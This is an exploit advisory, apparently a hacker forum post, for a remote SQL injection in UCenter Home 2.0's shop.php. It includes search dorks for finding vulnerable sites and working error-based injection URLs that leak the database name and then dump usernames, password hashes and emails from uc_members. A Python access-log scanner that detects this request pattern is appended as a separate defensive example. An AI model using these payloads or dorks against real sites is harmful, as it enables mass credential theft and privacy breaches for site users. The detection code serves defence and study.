__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability Type : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For injection : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
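
A defender-side check for the request pattern described in this advisory, as an added example that is not part of the original post: it scans web access logs for shop.php?ac=view requests whose shopid is not a plain integer or carries the error-based markers seen above. The log lines are constructed (the flagged one is an abbreviated form of the advisory's request shape), and the names inspect_line, scan and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the error-based pattern in this advisory, matched after URL-decoding.
MARKERS = {
    "floor(rand(0)*2) duplicate-key trick": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema access": re.compile(r"information_schema\s*\.", re.I),
    "nested select": re.compile(r"\(\s*select\b", re.I),
    "hex literal": re.compile(r"\b0x[0-9a-f]{2,}", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return the findings for a shop.php?ac=view request, or None if the line is not one."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)
    if (not url.path.lower().endswith("/shop.php") or "shopid" not in params
            or params.get("ac", [""])[-1] != "view"):
        return None
    value = params["shopid"][-1]  # PHP keeps the last duplicate parameter
    findings = []
    if not re.fullmatch(r"[0-9]+", value):
        findings.append("shopid is not a plain integer")
    findings += [name for name, rx in MARKERS.items() if rx.search(value)]
    return findings

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)'
    '%20and%201=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return (client address, findings) for every request that should be reviewed."""
    checked = ((line.split(" ", 1)[0], inspect_line(line)) for line in lines)
    return [(client, found) for client, found in checked if found]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, "->", "; ".join(findings))
```

Because shopid is expected to be numeric, the integer check alone flags any tampering; the markers only say which technique the request resembles.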